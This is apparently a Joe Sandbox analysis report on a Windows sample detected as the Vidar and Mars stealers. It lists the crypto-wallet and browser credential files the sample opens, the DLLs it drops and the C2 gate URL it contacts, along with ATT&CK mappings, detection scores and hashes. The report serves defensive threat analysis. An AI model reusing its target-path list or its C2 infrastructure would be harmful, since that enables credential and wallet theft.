Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: info.seco
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: file__0.localstorage
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default_wallet
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: multidoge.wallet
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seed.seco
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe PID: 6720, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe PID: 6720, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Mars stealer

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1854693658.000000000043E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1854680983.000000000043C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6090C1D6 sqlite3_clear_bindings,	0_2_6090C1D6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_609254B1 sqlite3_bind_zeroblob,	0_2_609254B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6090F435 sqlite3_bind_parameter_index,	0_2_6090F435
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_609255D4 sqlite3_bind_text16,	0_2_609255D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_609255FF sqlite3_bind_text,	0_2_609255FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60925686 sqlite3_bind_int64,	0_2_60925686
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_609256E5 sqlite3_bind_int,	0_2_609256E5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6092562A sqlite3_bind_blob,	0_2_6092562A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60925655 sqlite3_bind_null,	0_2_60925655
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6092570B sqlite3_bind_double,	0_2_6092570B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_60925778 sqlite3_bind_value,	0_2_60925778
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6090577D sqlite3_bind_parameter_name,	0_2_6090577D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6090576B sqlite3_bind_parameter_count,	0_2_6090576B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_6090EAE5 sqlite3_transfer_bindings,	0_2_6090EAE5

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	31 Native API	Path Interception	11 Process Injection	1 Masquerading	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Virtualization/Sandbox Evasion	LSASS Memory	131 Security Software Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	23 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Software Packing	DCSync	225 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	53%	ReversingLabs	Win32.Trojan.Leonem
SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	68%	Virustotal		Browse
SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	100%	Avira	TR/Crypt.XPACK.Gen3
SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal	Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal	Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal	Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal	Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal	Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Virustotal	Browse

Source	Detection	Scanner	Label	Link
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://alpha.twinsources.shop/request	0%	Avira URL Cloud	safe
alpha.twinsources.shop/gate.php	100%	Avira URL Cloud	malware
http://alpha.twinsources.shop/gate.php(	0%	Avira URL Cloud	safe
http://alpha.twinsources.shop/gate.php	100%	Avira URL Cloud	malware
http://www.mozilla.com0	0%	Avira URL Cloud	safe
alpha.twinsources.shop/gate.php	1%	Virustotal		Browse
http://alpha.twinsources.shop/request	0%	Virustotal		Browse
http://alpha.twinsources.shop/gate.php	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
alpha.twinsources.shop	179.43.170.230	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://alpha.twinsources.shop/gate.php	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
alpha.twinsources.shop/gate.php	true	1%, Virustotal, Browse Avira URL Cloud: malware	low
http://alpha.twinsources.shop/request	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	US0HLXBA.0.dr	false		high
https://duckduckgo.com/chrome_newtab	US0HLXBA.0.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837204620.000000000F22E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.0.dr	false		high
https://duckduckgo.com/ac/?q=	US0HLXBA.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	US0HLXBA.0.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false		high
http://ocsp.thawte.com0	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	US0HLXBA.0.dr	false		high
http://www.mozilla.com0	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	US0HLXBA.0.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	US0HLXBA.0.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872944797.000000000F603000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1819324389.00000000006B4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872944797.000000000F603000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1819324389.00000000006B4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	US0HLXBA.0.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	US0HLXBA.0.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000003.1837204620.000000000F22E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873249236.00000000101B1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefox	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1873249236.00000000101B1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://alpha.twinsources.shop/gate.php(	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
179.43.170.230	alpha.twinsources.shop	Panama		51852	PLI-ASCH	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1344917
Start date and time:	2023-11-20 05:20:08 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/13@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 90 Number of non-executed functions: 89
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:21:09	API Interceptor	1x Sleep call for process: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
179.43.170.230	file.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	file.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	file.exe	Get hash	malicious	Phonk Miner	Browse	tradersteampoggx.space/SOSORRY.php
	file.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	file.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	SecuriteInfo.com.Variant.Tedy.374420.23408.9978.exe	Get hash	malicious	Phonk Miner	Browse	tradersteampoggx.space/BEBRIK.php
	file.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	file.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	file.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	RC6cR5Zkjc.exe	Get hash	malicious	Phonk Miner, RedLine, Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	file.exe	Get hash	malicious	Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	BG1ZjkOmTK.exe	Get hash	malicious	Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	sB5W4YtR18.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse	tradersteampoggx.space/SOSORRY.php
	file.exe	Get hash	malicious	Xmrig	Browse	tradersteampoggx.space/SOSORRY.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PLI-ASCH	SecuriteInfo.com.Variant.Trojan.Linux.Gafgyt.5.19527.31429.elf	Get hash	malicious	Unknown	Browse	190.211.252.22
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	179.43.156.214
	1451__TrogeShippingSchedule.doc	Get hash	malicious	FormBook	Browse	81.17.29.147
	Kwserhekrq.exe	Get hash	malicious	FormBook	Browse	81.17.18.197
	ins.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.17.18.194
	RFQ_GEC18.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.17.18.197
	Petronas196887.exe	Get hash	malicious	AgentTesla	Browse	179.43.183.46
	Petronas196885.exe	Get hash	malicious	AgentTesla	Browse	179.43.183.46
	INVOICE 18102023 PDF.lzh	Get hash	malicious	FormBook	Browse	81.17.18.197
	RFQ_GEC-14.exe	Get hash	malicious	FormBook, GuLoader	Browse	81.17.29.146
	CONFIRMATION.EXE.exe	Get hash	malicious	AgentTesla	Browse	179.43.183.46
	Purchase_order.exe	Get hash	malicious	Unknown	Browse	81.17.29.147
	19.10.2023_Tarihli_#U0130#U015flem_Dekontu.exe	Get hash	malicious	Unknown	Browse	81.17.29.146
	oyCsPSsdbC.exe	Get hash	malicious	Unknown	Browse	81.17.18.196
	PO_1632_1.xls	Get hash	malicious	Unknown	Browse	81.17.29.146
	Invoicegpj.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	179.43.183.46
	documentpau.exe	Get hash	malicious	AgentTesla	Browse	179.43.183.46
	SISF23208BP_1.xls	Get hash	malicious	Unknown	Browse	81.17.18.196
	kswapd0	Get hash	malicious	Unknown	Browse	179.43.139.84
	16965013835371bade819b828d2ef6e24480e6d349f5b28ef4ea2aba6ea0633ce7f5b34953602.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	179.43.183.46

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	PmX1jHdUnS.exe	Get hash	malicious	Oski Stealer, Vidar	Browse
	INV_34897003.pif.exe	Get hash	malicious	Mars Stealer, Vidar	Browse
	cBMUYyAn60.exe	Get hash	malicious	Oski Stealer, Vidar	Browse
	file.exe	Get hash	malicious	PrivateLoader, Vidar	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader, Vidar	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader, Vidar	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader	Browse

Created / dropped Files

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: PmX1jHdUnS.exe, Detection: malicious, Browse Filename: INV_34897003.pif.exe, Detection: malicious, Browse Filename: cBMUYyAn60.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: 